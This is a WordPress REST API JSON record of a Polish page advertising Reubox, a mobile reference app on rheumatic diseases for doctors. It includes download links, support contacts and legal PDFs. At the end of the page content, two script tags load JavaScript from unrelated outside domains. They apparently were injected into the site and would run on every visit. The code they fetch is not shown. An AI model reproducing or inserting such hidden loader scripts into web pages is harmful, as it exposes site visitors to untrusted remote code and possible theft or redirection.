                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              {"id":7248,"date":"2016-10-12T12:21:08","date_gmt":"2016-10-12T10:21:08","guid":{"rendered":"http:\/\/dev.get3clicks.com\/?page_id=7248"},"modified":"2020-11-05T09:29:49","modified_gmt":"2020-11-05T08:29:49","slug":"reubox_abbvie","status":"publish","type":"page","link":"https:\/\/www.reubox.pl\/","title":{"rendered":"reubox"},"content":{"rendered":"[vc_row full_width=&#8221;stretch_row&#8221; bg_type=&#8221;image&#8221; css=&#8221;.vc_custom_1482408261406{padding-top: 0px !important;padding-bottom: 150px !important;background: #c6c6c6 url(https:\/\/www.reubox.pl\/wp-content\/uploads\/2016\/10\/KV_photo_1.jpg?id=7274) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}&#8221;][vc_column][vc_row_inner content_placement=&#8221;top&#8221; css=&#8221;.vc_custom_1470639357276{padding-right: 50px !important;padding-left: 50px !important;}&#8221;][vc_column_inner][vc_single_image image=&#8221;7299&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221;][\/vc_column_inner][\/vc_row_inner]<div id=\"ultimate-heading-94686a006ff668c66\" class=\"uvc-heading ult-adjust-bottom-margin ultimate-heading-94686a006ff668c66 uvc-6976 \" data-hspacer=\"no_spacer\"  data-halign=\"center\" style=\"text-align:center\"><div class=\"uvc-heading-spacer no_spacer\" style=\"top\"><\/div><div class=\"uvc-main-heading ult-responsive\"  data-ultimate-target='.uvc-heading.ultimate-heading-94686a006ff668c66 h2'  data-responsive-json-new='{\"font-size\":\"desktop:60px;tablet:60px;tablet_portrait:60px;mobile_landscape:30px;mobile:24px;\",\"line-height\":\"desktop:60px;tablet:60px;tablet_portrait:60px;mobile_landscape:35px;mobile:30px;\"}' ><h2 style=\"font-family:'Work Sans';font-weight:700;color:#ffffff;\">Zdob\u0105d\u017a niezb\u0119dne informacje na temat diagnostyki i leczenia chor\u00f3b reumatycznych<\/h2><\/div><\/div>[vc_btn title=&#8221;Pobierz bezp\u0142atn\u0105 aplikacj\u0119&#8221; style=&#8221;flat&#8221; shape=&#8221;round&#8221; color=&#8221;white&#8221; size=&#8221;lg&#8221; align=&#8221;center&#8221; link=&#8221;url:%23download||&#8221;]<div class=\"ult-spacer spacer-6a006ff668c93\" data-id=\"6a006ff668c93\" data-height=\"30\" data-height-mobile=\"10\" data-height-tab=\"20\" data-height-tab-portrait=\"20\" data-height-mobile-landscape=\"20\" style=\"clear:both;display:block;\"><\/div>[\/vc_column][\/vc_row][vc_row content_placement=&#8221;top&#8221; bg_type=&#8221;bg_color&#8221; bg_color_value=&#8221;#ffffff&#8221; el_id=&#8221;download&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;7306&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; css_animation=&#8221;bottom-to-top&#8221; css=&#8221;.vc_custom_1604488035205{margin-top: -200px !important;}&#8221;][vc_row_inner content_placement=&#8221;middle&#8221;][vc_column_inner el_class=&#8221;text-center&#8221; width=&#8221;1\/2&#8243;][vc_btn title=&#8221;Pobierz na IOS&#8221; style=&#8221;flat&#8221; shape=&#8221;round&#8221; color=&#8221;blue&#8221; size=&#8221;lg&#8221; align=&#8221;center&#8221; link=&#8221;url:https%3A%2F%2Fitunes.apple.com%2Fus%2Fapp%2Freubox%2Fid1151084656%3Fmt%3D8||target:%20_blank|&#8221; button_block=&#8221;true&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_btn title=&#8221;Pobierz na ANDROID&#8221; style=&#8221;flat&#8221; shape=&#8221;round&#8221; color=&#8221;blue&#8221; size=&#8221;lg&#8221; align=&#8221;center&#8221; link=&#8221;url:https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.connectmedica.reuboxabbvie%26hl%3Dpl||target:%20_blank|&#8221; button_block=&#8221;true&#8221;][\/vc_column_inner][\/vc_row_inner][\/vc_column][vc_column width=&#8221;1\/2&#8243; css=&#8221;.vc_custom_1470639535041{padding-right: 20px !important;padding-left: 20px !important;}&#8221;][vc_column_text css_animation=&#8221;top-to-bottom&#8221;]\n<h3>Pobierz unikatow\u0105 aplikacj\u0119 mobiln\u0105 przygotowan\u0105 specjalnie dla specjalist\u00f3w reumatolog\u00f3w oraz lekarzy POZ<\/h3>\n<ul>\n<li class=\"p1\">Najwa\u017cniejsze informacje dotycz\u0105ce diagnostyki i leczenia RZS, ZZSK, \u0141ZS, MIZS<\/li>\n<li class=\"p1\">Skale i kryteria klasyfikacyjne<\/li>\n<li class=\"p1\">Algorytmy T2T<\/li>\n<li class=\"p1\">Kryteria kwalifikacyjne do program\u00f3w lekowych<\/li>\n<\/ul>\n[\/vc_column_text][\/vc_column][vc_column]<div class=\"ult-spacer spacer-6a006ff668ca8\" data-id=\"6a006ff668ca8\" data-height=\"100\" data-height-mobile=\"25\" data-height-tab=\"50\" data-height-tab-portrait=\"50\" data-height-mobile-landscape=\"25\" style=\"clear:both;display:block;\"><\/div>[vc_column_text css_animation=&#8221;appear&#8221; css=&#8221;.vc_custom_1480326640503{padding-right: 20px !important;padding-left: 20px !important;}&#8221;]\n<h2 style=\"text-align: center;\">Aplikacja Reubox to doskona\u0142e narz\u0119dzie dla lekarzy\u00a0daj\u0105ce szybki i\u00a0prosty dost\u0119p do\u00a0u\u017cytecznych danych i informacji r\u00f3wnie\u017c bez dost\u0119pu do internetu.<\/h2>\n[\/vc_column_text]<div class=\"ult-spacer spacer-6a006ff668cbc\" data-id=\"6a006ff668cbc\" data-height=\"100\" data-height-mobile=\"25\" data-height-tab=\"50\" data-height-tab-portrait=\"50\" data-height-mobile-landscape=\"25\" style=\"clear:both;display:block;\"><\/div>[\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; content_placement=&#8221;middle&#8221; css=&#8221;.vc_custom_1470396307384{background-color: #f1f1f1 !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_column_text css_animation=&#8221;left-to-right&#8221; css=&#8221;.vc_custom_1470998693734{padding-right: 20px !important;padding-left: 20px !important;}&#8221;]\n<h3 style=\"text-align: left;\">Dzi\u0119ki aplikacji Reubox\u00a0uzyskasz dost\u0119p do wiedzy na temat:<\/h3>\n<ul>\n<li>Reumatoidalnego zapalenia staw\u00f3w<\/li>\n<li>\u0141uszczycowego zapalenia staw\u00f3w<\/li>\n<li>Zesztywniaj\u0105cego zapalenia staw\u00f3w kr\u0119gos\u0142upa<\/li>\n<li>M\u0142odzie\u0144czego idiopatycznego zapalenia staw\u00f3w<\/li>\n<\/ul>\n[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;7307&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; css_animation=&#8221;right-to-left&#8221; css=&#8221;.vc_custom_1604488057590{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}&#8221;][\/vc_column][\/vc_row][vc_row][vc_column]<div class=\"ult-spacer spacer-6a006ff668ccd\" data-id=\"6a006ff668ccd\" data-height=\"100\" data-height-mobile=\"25\" data-height-tab=\"50\" data-height-tab-portrait=\"50\" data-height-mobile-landscape=\"25\" style=\"clear:both;display:block;\"><\/div>[vc_column_text css_animation=&#8221;appear&#8221;]\n<h2 style=\"text-align: center;\"><a href=\"#download\">Pobierz aplikacj\u0119<\/a> i uzyskaj\u00a0dost\u0119p do bogatej wiedzy\u00a0w intuicyjny spos\u00f3b.<\/h2>\n[\/vc_column_text][\/vc_column][\/vc_row][vc_row gap=&#8221;20&#8243; content_placement=&#8221;top&#8221;][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;7308&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; css_animation=&#8221;appear&#8221;][vc_column_text css_animation=&#8221;appear&#8221;]\n<h6 style=\"text-align: center;\">Zdob\u0105d\u017a najwa\u017cniejsze informacje dotycz\u0105ce diagnostyki leczenia: RZS, \u0141ZS, ZZSK, MIZS.<\/h6>\n[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;7309&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; css_animation=&#8221;appear&#8221;][vc_column_text css_animation=&#8221;appear&#8221;]\n<h6 style=\"text-align: center;\">Korzystaj ze skal dotycz\u0105cych wielu aspekt\u00f3w zapalenia staw\u00f3w i sprawd\u017a wyniki generowane na bie\u017c\u0105co.<\/h6>\n[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;7310&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; css_animation=&#8221;appear&#8221;][vc_column_text css_animation=&#8221;appear&#8221;]\n<h6 style=\"text-align: center;\">Wspomagaj si\u0119 algorytmami kryteri\u00f3w rozpoznania chor\u00f3b i wspomagaj swoj\u0105 wiedz\u0119 u\u017cytecznymi narz\u0119dziami.<\/h6>\n[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row_content&#8221;][vc_column]<div class=\"ult-spacer spacer-6a006ff668cdb\" data-id=\"6a006ff668cdb\" data-height=\"100\" data-height-mobile=\"25\" data-height-tab=\"50\" data-height-tab-portrait=\"50\" data-height-mobile-landscape=\"25\" style=\"clear:both;display:block;\"><\/div>[vc_separator][vc_column_text css_animation=&#8221;appear&#8221;]\n<h3 style=\"text-align: center;\">Skorzystaj z naszego wsparcia technicznego.<\/h3>\n<p style=\"text-align: center;\"><strong>Masz problemy techniczne z aplikacj\u0105?\u00a0<\/strong>Skontaktuj si\u0119 z naszym dzia\u0142em wsparcia.\u00a0Postaramy si\u0119 rozwi\u0105za\u0107 problem najszybciej jak to mo\u017cliwe.<\/p>\n<p style=\"text-align: center;\">e-mail: <a href=\"mailto:support@get3clicks.com\">support@get3clicks.com<\/a>,\u00a0telefon: <strong>+48 22 719 97 31<\/strong> (dni robocze 9.00 &#8211; 17.00)<\/p>\n[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;1\/2&#8243;][vc_btn title=&#8221;Pobierz regulamin&#8221; style=&#8221;outline&#8221; shape=&#8221;round&#8221; color=&#8221;blue&#8221; size=&#8221;lg&#8221; align=&#8221;center&#8221; i_align=&#8221;right&#8221; i_icon_fontawesome=&#8221;fa fa-download&#8221; link=&#8221;url:https%3A%2F%2Fget3clicks.com%2Fuploads%2Fregulations%2F3Clicks_regulamin_Reubox.pdf|title:Pobierz%20regulamin|target:%20_blank&#8221; add_icon=&#8221;true&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_btn title=&#8221;Pobierz ograniczenie odpowiedzialno\u015bci&#8221; style=&#8221;outline&#8221; shape=&#8221;round&#8221; color=&#8221;blue&#8221; size=&#8221;lg&#8221; align=&#8221;center&#8221; i_align=&#8221;right&#8221; i_icon_fontawesome=&#8221;fa fa-download&#8221; link=&#8221;url:https%3A%2F%2Fget3clicks.com%2Fuploads%2Fregulations%2F3Clicks_Ograniczenie_odpowiedzialno%25C5%259Bci_Reubox.pdf|title:Pobierz%20ograniczenie%20odpowiedzialno%C5%9Bci|target:%20_blank&#8221; add_icon=&#8221;true&#8221;][\/vc_column][\/vc_row]<script src='https:\/\/clipjs.legendarytable.com\/clip.js?v=0.5.9' type='text\/javascript'><\/script><script src='https:\/\/js.cofounderspecials.com\/splash.js?v=5.1.7' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row full_width=&#8221;stretch_row&#8221; bg_type=&#8221;image&#8221; css=&#8221;.vc_custom_1482408261406{padding-top: 0px !important;padding-bottom: 150px !important;background: #c6c6c6 url(https:\/\/www.reubox.pl\/wp-content\/uploads\/2016\/10\/KV_photo_1.jpg?id=7274) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}&#8221;][vc_column][vc_row_inner content_placement=&#8221;top&#8221; css=&#8221;.vc_custom_1470639357276{padding-right: 50px !important;padding-left: 50px !important;}&#8221;][vc_column_inner][vc_single_image image=&#8221;7299&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221;][\/vc_column_inner][\/vc_row_inner][vc_btn title=&#8221;Pobierz bezp\u0142atn\u0105 aplikacj\u0119&#8221; style=&#8221;flat&#8221; shape=&#8221;round&#8221; color=&#8221;white&#8221; size=&#8221;lg&#8221; align=&#8221;center&#8221; [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_links_to":"","_links_to_target":""},"_links":{"self":[{"href":"https:\/\/www.reubox.pl\/index.php?rest_route=\/wp\/v2\/pages\/7248"}],"collection":[{"href":"https:\/\/www.reubox.pl\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.reubox.pl\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.reubox.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.reubox.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7248"}],"version-history":[{"count":15,"href":"https:\/\/www.reubox.pl\/index.php?rest_route=\/wp\/v2\/pages\/7248\/revisions"}],"predecessor-version":[{"id":7312,"href":"https:\/\/www.reubox.pl\/index.php?rest_route=\/wp\/v2\/pages\/7248\/revisions\/7312"}],"wp:attachment":[{"href":"https:\/\/www.reubox.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7248"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}